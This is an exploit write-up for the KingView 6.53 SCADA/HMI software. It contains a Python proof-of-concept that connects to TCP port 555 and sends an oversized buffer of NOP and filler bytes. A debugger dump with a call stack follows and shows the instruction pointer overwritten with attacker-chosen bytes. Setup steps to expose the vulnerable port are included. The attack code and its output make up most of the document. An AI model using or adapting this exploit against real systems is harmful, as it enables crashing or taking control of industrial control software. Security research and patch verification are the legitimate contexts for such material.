# Exploit Title: Kingview TouchviewEIP direct control# Date: June 24 2012# Exploit Author: Carlos Mario Penagos Hollmann# Vendor Homepage: www.kingview.com# Version: 6.53# Tested on: Windows SP 1# CVE :
Open kingivew click on Make choose network configuration--->network
parameter , thengo to the node type and choose Local is a Login Server,
run the demo port 555 will be open.
NOTE:
This was already patched by the vendor silently.
import os
import socket
import sys
host ="10.0.2.15"
port = 555
exploit = ("\x90"*1024)
exploit +=("A"*23976)
exploit +=("B"*12500)
exploit +=("D"*6250)
exploit +=("E"*6002)
exploit +=("\x44\x43\x42\x41")
exploit +=("\x90"*256)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
s.send(exploit)data = s.recv(1024)
print "[+] Closing connection.."
s.close()
print "[+] Done!"
eax=7ffdf000 ebx=00000000 ecx=40000000 edx=00000008 esi=41424344
edi=0012f6b4
eip=41424344 esp=0012f650 ebp=0012f678 iopl=0 nv up ei pl nz na po
nc
cs=001bss=0023ds=0023es=0023fs=003bgs=0000
efl=00010202
41424344 ??
CALL TO STACK
0x41424344
USER32!GetDC+0x6d
USER32!EnumDisplaySettingsA+0x27d
USER32!EnumDisplaySettingsA+0xc9
USER32!DefDlgProcA+0x22
